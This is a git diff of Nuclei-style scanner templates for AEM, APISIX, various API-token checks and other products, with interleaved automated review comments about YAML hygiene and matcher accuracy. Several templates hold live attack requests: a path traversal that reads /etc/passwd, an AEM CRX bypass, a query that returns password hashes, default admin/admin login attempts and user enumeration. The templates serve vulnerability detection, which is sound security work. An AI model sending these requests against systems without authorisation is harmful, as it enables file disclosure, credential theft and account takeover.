cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/adobe/adobe-connect-username-exposure.yaml b/poc/adobe/adobe-connect-username-exposure.yaml index 088b39ad5e..e47b4fe88b 100644 --- a/poc/adobe/adobe-connect-username-exposure.yaml +++ b/poc/adobe/adobe-connect-username-exposure.yaml 
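Review bot: The `classification` block added in the first hunk of `adobe-connect-central-login.yaml` leaves `cve-id:` with a bare empty value, which a YAML parser loads as null rather than as an empty string. This is a login-panel detection with no CVE, so either drop the key or state the intent explicitly with `cve-id: null`. The same block pairs `cwe-id: CWE-200` with `cvss-score: 0.0` on an `info` finding; a one-line comment above `classification:` explaining why an information-exposure CWE is attached to a plain panel detection would help whoever triages the result.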
@@ -1,26 +1,26 @@ -id: adobe-connect-username-exposure - -info: - name: Adobe Connect Username Exposure - reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html - author: dhiyaneshDk - severity: low - tags: adobe,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/system/help/support" - - matchers-condition: and - matchers: - - type: word - words: - - 'Administrators name:' - - 'Support Administrators email address:' - part: body - condition: and - - - type: status - status: - - 200 +id: adobe-connect-username-exposure + +info: + name: Adobe Connect Username Exposure + reference: https://packetstormsecurity.com/files/161345/Adobe-Connect-10-Username-Disclosure.html + author: dhiyaneshDk + severity: low + tags: adobe,disclosure + +requests: + - method: GET + path: + - "{{BaseURL}}/system/help/support" + + matchers-condition: and + matchers: + - type: word + words: + - 'Administrators name:' + - 'Support Administrators email address:' + part: body + condition: and + + - type: status + status: + - 200 diff --git a/poc/adobe/aem-crx-bypass.yaml b/poc/adobe/aem-crx-bypass.yaml index 6607f936be..a6187d442a 100644 --- a/poc/adobe/aem-crx-bypass.yaml +++ b/poc/adobe/aem-crx-bypass.yaml @@ -1,10 +1,12 @@ id: aem-crx-bypass + info: author: dhiyaneshDK name: AEM CRX Bypass severity: critical reference: https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/ tags: aem + requests: - raw: - | @@ -12,11 +14,13 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate + - | GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} Accept-Encoding: gzip, deflate + matchers-condition: and matchers: - type: word 
@@ -26,10 +30,12 @@ requests: - 'downloadName' - 'acHandling' condition: and + - type: word part: header words: - 'application/json' + - type: status status: - 200 diff --git a/poc/adobe/aem-default-get-servlet-139.yaml b/poc/adobe/aem-default-get-servlet-139.yaml index 274b345439..7186c2256f 100644 --- a/poc/adobe/aem-default-get-servlet-139.yaml +++ b/poc/adobe/aem-default-get-servlet-139.yaml @@ -1,26 +1,15 @@ id: aem-default-get-servlet - info: - name: AEM DefaultGetServlet author: DhiyaneshDk + name: AEM DefaultGetServlet severity: low - description: Sensitive information might be exposed via AEM DefaultGetServlet. - reference: - - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/GetServletExposed.java - tags: aem,adobe + reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=43 + tags: aem + requests: - method: GET path: - - '{{BaseURL}}/etc' - - '{{BaseURL}}/var' - - '{{BaseURL}}/apps' - - '{{BaseURL}}/home' - - '{{BaseURL}}///etc' - - '{{BaseURL}}///var' - - '{{BaseURL}}///apps' - - '{{BaseURL}}///home' - '{{BaseURL}}/.json' - '{{BaseURL}}/.1.json' - '{{BaseURL}}/....4.2.1....json' diff --git a/poc/adobe/aem-detection-146.yaml b/poc/adobe/aem-detection-146.yaml index 421bb35f54..bb3d7e0753 100644 --- a/poc/adobe/aem-detection-146.yaml +++ b/poc/adobe/aem-detection-146.yaml @@ -2,9 +2,8 @@ id: aem-detection info: name: Favicon based AEM Detection - severity: info author: shifacyclewala,hackergautam - tags: aem,favicon,tech + severity: info reference: - https://twitter.com/brsn76945860/status/1171233054951501824 - https://gist.github.com/yehgdotnet/b9dfc618108d2f05845c4d8e28c5fc6a 
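Review bot: The rewritten `info` block of `aem-default-get-servlet-139.yaml` no longer carries a `description`, and the second reference and the `adobe` tag are gone as well, so a finding from this template arrives without context. I would keep the line from the old side, `description: Sensitive information might be exposed via AEM DefaultGetServlet.`. The hunk also removes the `/etc`, `/var`, `/apps` and `/home` entries (plain and `///`-prefixed) from `path`; if that narrowing is intended, a comment above `path:` should say why. The path list and the matchers continue outside the hunk.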
@@ -13,6 +12,7 @@ info: - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv metadata: shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech,adobe requests: - method: GET @@ -25,4 +25,4 @@ requests: matchers: - type: dsl dsl: - - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" \ No newline at end of file + - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" diff --git a/poc/adobe/aem-groovyconsole-154.yaml b/poc/adobe/aem-groovyconsole-154.yaml index 7cac692c6b..b37f3f8d94 100644 --- a/poc/adobe/aem-groovyconsole-154.yaml +++ b/poc/adobe/aem-groovyconsole-154.yaml @@ -1,19 +1,22 @@ id: aem-groovyconsole info: - name: AEM Groovy console exposed - author: d3sca + name: AEM Groovy Console Discovery + author: Dheerajmadhukar severity: critical - description: Groovy console is exposed. - tags: aem + description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution. + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 + tags: aem,adobe requests: - method: GET path: - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/groovyconsole.html" + - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -26,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/22 diff --git a/poc/adobe/aem-hash-querybuilder-157.yaml b/poc/adobe/aem-hash-querybuilder-157.yaml index 50ae6efbd4..9547fb1a96 100644 --- a/poc/adobe/aem-hash-querybuilder-157.yaml 
+++ b/poc/adobe/aem-hash-querybuilder-157.yaml @@ -1,12 +1,11 @@ id: aem-hash-querybuilder - info: - author: DhiyaneshDk name: Query hashed password via QueryBuilder Servlet + author: DhiyaneshDk severity: medium - reference: https://twitter.com/AEMSecurity/status/1372392101829349376 + reference: + - https://twitter.com/AEMSecurity/status/1372392101829349376 tags: aem - requests: - raw: - | @@ -15,15 +14,13 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - '"success":true' - 'rep:password' - condition: and \ No newline at end of file + condition: and diff --git a/poc/adobe/aem-querybuilder-internal-path-read.yaml b/poc/adobe/aem-querybuilder-internal-path-read.yaml index 5e8033b220..f088c74a61 100644 --- a/poc/adobe/aem-querybuilder-internal-path-read.yaml +++ b/poc/adobe/aem-querybuilder-internal-path-read.yaml @@ -1,10 +1,13 @@ id: aem-querybuilder-internal-path-read + info: author: DhiyaneshDk name: AEM QueryBuilder Internal Path Read severity: medium reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 tags: aem + + requests: - method: GET path: @@ -12,13 +15,16 @@ requests: - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' + + stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - 'jcr:path' - 'success' - condition: and + condition: and \ No newline at end of file diff --git a/poc/adobe/aem-querybuilder-json-servlet-187.yaml b/poc/adobe/aem-querybuilder-json-servlet-187.yaml index 18210457c8..48870c0894 100644 --- a/poc/adobe/aem-querybuilder-json-servlet-187.yaml 
+++ b/poc/adobe/aem-querybuilder-json-servlet-187.yaml @@ -18,11 +18,6 @@ requests: status: - 200 - - type: word - words: - - "application/json" - part: header - - type: word words: - 'success' diff --git a/poc/adobe/aem-userinfo-servlet.yaml b/poc/adobe/aem-userinfo-servlet.yaml index 0fe58a4195..01684b7d96 100644 --- a/poc/adobe/aem-userinfo-servlet.yaml +++ b/poc/adobe/aem-userinfo-servlet.yaml @@ -4,8 +4,8 @@ info: author: DhiyaneshDk name: AEM UserInfo Servlet severity: info - description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. - tags: aem + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem,bruteforce requests: @@ -19,7 +19,13 @@ requests: - 200 - type: word + part: body words: - - 'userName' - - 'userID' + - '"userID":' + - '"userName":' condition: and + + - type: word + part: header + words: + - 'application/json' diff --git a/poc/apache/default-apache-test-page-6816.yaml b/poc/apache/default-apache-test-page-6816.yaml index d76fd5ac60..ade74d648c 100644 --- a/poc/apache/default-apache-test-page-6816.yaml +++ b/poc/apache/default-apache-test-page-6816.yaml @@ -4,8 +4,8 @@ info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - reference: - - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22 + metadata: + shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" tags: tech,apache requests: diff --git a/poc/api/Google-api.yaml b/poc/api/Google-api.yaml index b5b0737aa7..1242ce0367 100644 --- a/poc/api/Google-api.yaml +++ b/poc/api/Google-api.yaml 
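Review bot: Removing the `application/json` header matcher in `aem-querybuilder-json-servlet-187.yaml` leaves the template deciding on the status code and body words alone, which makes false positives more likely: an HTML page returned with 200 that happens to contain `success` would now qualify. The change to `aem-userinfo-servlet.yaml` later in this commit goes the other way and adds exactly this check. I would keep the removed matcher in the form used there: `- type: word`, `part: header`, `words: ['application/json']`. The `matchers-condition` and the rest of the word list are outside the hunk, so this assumes the matchers are combined with `and`.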
@@ -1,12 +1,15 @@ id: google-api-key-file + info: name: Google API key author: gaurang severity: info tags: token,file,google + file: - extensions: - all + extractors: - type: regex regex: diff --git a/poc/api/alfacgiapi-wordpress-257.yaml b/poc/api/alfacgiapi-wordpress-257.yaml index 271a1c4865..69b0d39f88 100644 --- a/poc/api/alfacgiapi-wordpress-257.yaml +++ b/poc/api/alfacgiapi-wordpress-257.yaml @@ -1,32 +1,30 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 +id: alfacgiapi-wordpress +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 
diff --git a/poc/api/api-abstractapi.yaml b/poc/api/api-abstractapi.yaml index b6eecac2ef..d817d4faeb 100644 --- a/poc/api/api-abstractapi.yaml +++ b/poc/api/api-abstractapi.yaml @@ -19,7 +19,7 @@ requests: - type: word part: body words: - - '"total_count":' - - '"limit":' - - '"offset":' + - '"name_local":' + - '"location":' + - '"date_year":' condition: and diff --git a/poc/api/api-abuseipdb.yaml b/poc/api/api-abuseipdb.yaml index 077084fa93..ca83d86700 100644 --- a/poc/api/api-abuseipdb.yaml +++ b/poc/api/api-abuseipdb.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://docs.abuseipdb.com/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/AbuseIPDB.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md tags: token-spray,abuseipdb self-contained: true diff --git a/poc/api/api-bible.yaml b/poc/api/api-bible.yaml index 313d9d6612..9e47277d90 100644 --- a/poc/api/api-bible.yaml +++ b/poc/api/api-bible.yaml @@ -4,9 +4,10 @@ info: name: API.Bible API Test author: daffainfo severity: info + description: Everything you need from the Bible in one discoverable place reference: - https://docs.api.bible - - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md + - https://github.com/daffainfo/all-about-apikey/tree/main/api-bible tags: token-spray,bible self-contained: true diff --git a/poc/api/api-bravenewcoin.yaml b/poc/api/api-bravenewcoin.yaml index 1fa0c10281..ef81f36b71 100644 --- a/poc/api/api-bravenewcoin.yaml +++ b/poc/api/api-bravenewcoin.yaml @@ -4,10 +4,9 @@ info: name: Brave New Coin API Test author: daffainfo severity: info - description: Real-time and historic crypto data from more than 200+ exchanges reference: - https://bravenewcoin.com/developers - - https://github.com/daffainfo/all-about-apikey/tree/main/brave-new-coin + - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Brave%20New%20Coin.md tags: token-spray,bravenewcoin self-contained: true 
diff --git a/poc/api/api-buildkite-402.yaml b/poc/api/api-buildkite-402.yaml index 77e8e1e677..7855f0b53b 100644 --- a/poc/api/api-buildkite-402.yaml +++ b/poc/api/api-buildkite-402.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,buildkite +self-contained: true requests: - method: GET path: @@ -15,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 401 - negative: true + - type: word + part: body + words: + - '"id":' + - '"graphql_id":' + - '"email":' + condition: and \ No newline at end of file diff --git a/poc/api/api-circleci-405.yaml b/poc/api/api-circleci-405.yaml index 281d22b656..b01e427381 100644 --- a/poc/api/api-circleci-405.yaml +++ b/poc/api/api-circleci-405.yaml @@ -5,14 +5,18 @@ info: author: zzeitlin reference: https://circleci.com/docs/api/v1 severity: info - tags: token-spray,circle,circleci + tags: token-spray,circleci +self-contained: true requests: - method: GET path: - "https://circleci.com/api/v1.1/me?circle-token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"admin"' + - '"login"' + condition: and diff --git a/poc/api/api-covalent.yaml b/poc/api/api-covalent.yaml index 159aca5e52..9fb44a3d2e 100644 --- a/poc/api/api-covalent.yaml +++ b/poc/api/api-covalent.yaml @@ -4,9 +4,10 @@ info: name: Covalent API Test author: daffainfo severity: info + description: https://github.com/daffainfo/all-about-apikey/tree/main/covalent reference: - https://www.covalenthq.com/docs/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md + - https://github.com/daffainfo/all-about-apikey/tree/main/covalent tags: token-spray,covalent self-contained: true diff --git a/poc/api/api-dropbox-418.yaml b/poc/api/api-dropbox-418.yaml index 29679e2b2f..cc14c60421 100644 --- a/poc/api/api-dropbox-418.yaml +++ b/poc/api/api-dropbox-418.yaml 
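Review bot: The request in `api-circleci-405.yaml` still sends the token under test in the query string, `https://circleci.com/api/v1.1/me?circle-token={{token}}`, where it ends up in proxy logs, scan output and any saved request URL. The CircleCI API also accepts the token as a request header, so the path can be `"https://circleci.com/api/v1.1/me"` with `headers:` and `Circle-Token: "{{token}}"` below it. That would match how the Buildkite and Dropbox templates in this commit pass theirs in an `Authorization` header.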
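Review bot: The `description` added to `api-covalent.yaml` is a URL, `https://github.com/daffainfo/all-about-apikey/tree/main/covalent`, which the `reference` list two lines below repeats, so the field describes nothing. The other token-spray templates that gain a `description` in this commit use a one-sentence summary of the service. Either write such a sentence for Covalent or drop the `description` key.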
@@ -7,6 +7,7 @@ info: severity: info tags: token-spray,dropbox +self-contained: true requests: - method: POST path: @@ -15,6 +16,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"account_id":' + - '"email":' + condition: and diff --git a/poc/api/api-festivo.yaml b/poc/api/api-festivo.yaml index 3911ce2636..30f758bdf2 100644 --- a/poc/api/api-festivo.yaml +++ b/poc/api/api-festivo.yaml @@ -4,10 +4,9 @@ info: name: Festivo API Test author: daffainfo severity: info - description: Fastest and most advanced public holiday and observance service on the market reference: - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays + - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md tags: token-spray,festivo self-contained: true diff --git a/poc/api/api-harvardart.yaml b/poc/api/api-harvardart.yaml index 7b2f15b76f..e9f965433e 100644 --- a/poc/api/api-harvardart.yaml +++ b/poc/api/api-harvardart.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://github.com/harvardartmuseums/api-docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md tags: token-spray,harvardart self-contained: true diff --git a/poc/api/api-improvmx.yaml b/poc/api/api-improvmx.yaml index 1b6f7e7986..fb6c00f0d9 100644 --- a/poc/api/api-improvmx.yaml +++ b/poc/api/api-improvmx.yaml 
@@ -4,9 +4,10 @@ info: name: ImprovMX API Test author: daffainfo severity: info + description: API for free email forwarding service reference: - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md + - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx tags: token-spray,improvmx self-contained: true diff --git a/poc/api/api-instatus.yaml b/poc/api/api-instatus.yaml index 40ac71ae96..1175f1b8b3 100644 --- a/poc/api/api-instatus.yaml +++ b/poc/api/api-instatus.yaml @@ -4,9 +4,10 @@ info: name: Instatus API Test author: daffainfo severity: info + description: Post to and update maintenance and incidents on your status page through an HTTP REST API reference: - https://instatus.com/help/api - - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Instatus.md + - https://github.com/daffainfo/all-about-apikey/tree/main/instatus tags: token-spray,instatus self-contained: true diff --git a/poc/api/api-mailchimp-454.yaml b/poc/api/api-mailchimp-454.yaml index 5232ddda97..9d7073e46c 100644 --- a/poc/api/api-mailchimp-454.yaml +++ b/poc/api/api-mailchimp-454.yaml @@ -3,11 +3,10 @@ id: api-mailchimp info: name: Mailchimp API Test author: zzeitlin - severity: info reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration + severity: info tags: token-spray,mailchimp -self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" diff --git a/poc/api/api-malwarebazaar.yaml b/poc/api/api-malwarebazaar.yaml index ce99bd0a43..f261796b92 100644 --- a/poc/api/api-malwarebazaar.yaml +++ b/poc/api/api-malwarebazaar.yaml 
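Review bot: This hunk drops `self-contained: true` from api-mailchimp-454.yaml while the buildkite, circleci and dropbox hunks in the same commit add it to their token-spray templates; the first api-pivotaltracker.yaml hunk removes it as well. If the `host:` entry below the hunk is a fixed Mailchimp endpoint, as the `AUTH PLAIN` input suggests, the template then demands a scan target it never uses. Keep `self-contained: true` above `network:` (and above `requests:` in the pivotaltracker file) unless the host really comes from the target. The `network:` block continues outside the hunk, so the host could not be checked here.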
@@ -6,7 +6,7 @@ info: severity: info reference: - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md tags: token-spray,malwarebazaar self-contained: true diff --git a/poc/api/api-pastebin.yaml b/poc/api/api-pastebin.yaml index 143f639fb1..ab46ebbc09 100644 --- a/poc/api/api-pastebin.yaml +++ b/poc/api/api-pastebin.yaml @@ -4,9 +4,10 @@ info: name: Pastebin API Test author: daffainfo severity: info + description: Plain Text Storage reference: - https://pastebin.com/doc_api - - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md + - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin tags: token-spray,pastebin self-contained: true diff --git a/poc/api/api-pivotaltracker.yaml b/poc/api/api-pivotaltracker.yaml index 1f7e7007e0..c52e04af9a 100644 --- a/poc/api/api-pivotaltracker.yaml +++ b/poc/api/api-pivotaltracker.yaml @@ -7,7 +7,6 @@ info: severity: info tags: token-spray,pivotaltracker -self-contained: true requests: - method: GET path: @@ -21,4 +20,3 @@ requests: negative: true words: - 'invalid_authentication' - - 'unauthenticated' diff --git a/poc/api/api-quip.yaml b/poc/api/api-quip.yaml index 70239345aa..bb21c29c72 100644 --- a/poc/api/api-quip.yaml +++ b/poc/api/api-quip.yaml @@ -4,10 +4,9 @@ info: name: Quip API Test author: daffainfo severity: info - description: File Sharing and Storage for groups reference: - https://quip.com/dev/automation/documentation - - https://github.com/daffainfo/all-about-apikey/tree/main/quip + - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Quip.md tags: token-spray,quip self-contained: true diff --git a/poc/api/api-urlscan.yaml b/poc/api/api-urlscan.yaml index bcb14d8c1c..93d5b196db 100644 --- a/poc/api/api-urlscan.yaml +++ b/poc/api/api-urlscan.yaml 
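Review bot: Removing `- 'unauthenticated'` in the second api-pivotaltracker.yaml hunk leaves `invalid_authentication` as the only string the negative matcher rejects, so a refusal worded any other way is now reported as a working token. Restore the second word, or pair the negative matcher with a positive check on a field that only an authenticated response carries. The matcher's remaining keys and the request path are outside the hunk, so the exact condition could not be confirmed.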
@@ -6,7 +6,7 @@ info: severity: info reference: - https://urlscan.io/docs/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/URLScan.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/URLScan.md tags: token-spray,urlscan self-contained: true diff --git a/poc/api/apisix-default-login-490.yaml b/poc/api/apisix-default-login-490.yaml index c16b0c60b1..d89104b847 100644 --- a/poc/api/apisix-default-login-490.yaml +++ b/poc/api/apisix-default-login-490.yaml @@ -1,13 +1,22 @@ id: apisix-default-login + info: - name: Apache Apisix Default Login + name: Apache Apisix Default Admin Login author: pdteam - severity: critical - tags: apisix,apache,default-login + severity: high + description: An Apache Apisix default admin login was discovered. + reference: + - https://apisix.apache.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 metadata: shodan-query: title:"Apache APISIX Dashboard" fofa-query: title="Apache APISIX Dashboard" product: https://apisix.apache.org + tags: apisix,apache,default-login + requests: - raw: - | @@ -18,20 +27,25 @@ requests: Content-Type: application/json;charset=UTF-8 {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork payloads: user: - admin pass: - admin + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - '"data"' - '"token"' - '"code":0' condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/api/arcgis-rest-api.yaml b/poc/api/arcgis-rest-api.yaml index b60cfd2026..897c70d812 100644 --- a/poc/api/arcgis-rest-api.yaml +++ b/poc/api/arcgis-rest-api.yaml 
@@ -5,14 +5,11 @@ info: author: Podalirius severity: info description: ArcGIS documents were discovered. - tags: api,arcgis,cms reference: - https://enterprise.arcgis.com/en/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + tags: api,arcgis,cms requests: - method: GET diff --git a/poc/api/bems-api-lfi.yaml b/poc/api/bems-api-lfi.yaml index f81f84cfeb..ffddda6590 100644 --- a/poc/api/bems-api-lfi.yaml +++ b/poc/api/bems-api-lfi.yaml 
@@ -1,20 +1,24 @@ -id: bems-api-lfi -info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download - author: gy741 - severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php - tags: lfi -requests: - - method: GET - path: - - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0" - - type: status - status: - - 200 +id: bems-api-lfi + +info: + name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + author: gy741 + severity: high + description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + tags: lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/api/downloads?fileName=../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/poc/api/burp-api-detect.yaml b/poc/api/burp-api-detect.yaml index d1c703aa98..68a7000ee7 100644 --- a/poc/api/burp-api-detect.yaml +++ b/poc/api/burp-api-detect.yaml 
@@ -4,9 +4,7 @@ info: name: Burp Rest API Server Running author: joanbono severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech + reference: https://portswigger.net/burp/documentation/enterprise/api-reference requests: - method: GET diff --git a/poc/api/gitlab-api-user-enum.yaml b/poc/api/gitlab-api-user-enum.yaml index 4edf1734a5..da88f8d2fa 100644 --- a/poc/api/gitlab-api-user-enum.yaml +++ b/poc/api/gitlab-api-user-enum.yaml @@ -1,15 +1,10 @@ id: gitlab-api-user-enum - info: - name: GitLab - User Information Disclosure Via Open API author: Suman_Kar + name: GitLab - User Information Disclosure Via Open API severity: medium - reference: - - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 - metadata: - shodan-query: http.title:"GitLab" + reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 tags: gitlab,enum,misconfig,disclosure - requests: - raw: - | @@ -17,10 +12,8 @@ requests: Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} - payloads: uid: helpers/wordlists/numbers.txt - stop-at-first-match: true matchers-condition: and matchers: @@ -31,12 +24,10 @@ requests: - "username.*" - "id.*" - "name.*" - - type: word part: header words: - "application/json" - - type: status status: - 200 diff --git a/poc/api/google-api-key.yaml b/poc/api/google-api-key.yaml index 1798c569c3..d8a2a240cd 100644 --- a/poc/api/google-api-key.yaml +++ b/poc/api/google-api-key.yaml 
@@ -1,19 +1,24 @@ -id: google-api-key - -info: - name: Google API Key - author: Swissky - severity: info - tags: exposure,token,google - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/hopfully404" - - extractors: - - type: regex - part: body - regex: - - "AIza[0-9A-Za-z\\-_]{35}" +id: google-api-key + +info: + name: Google API Key + author: Swissky + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" + + extractors: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/poc/api/kube-api-namespaces.yaml b/poc/api/kube-api-namespaces.yaml index 8d0b0d8792..b4e820623c 100644 --- a/poc/api/kube-api-namespaces.yaml +++ b/poc/api/kube-api-namespaces.yaml @@ -1,26 +1,22 @@ id: kube-api-namespaces - info: name: Kube API Namespaces author: sharath severity: info description: Scans for kube namespaces tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/namespaces" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '"NamespaceList":' - '"items":' - condition: and \ No newline at end of file + condition: and diff --git 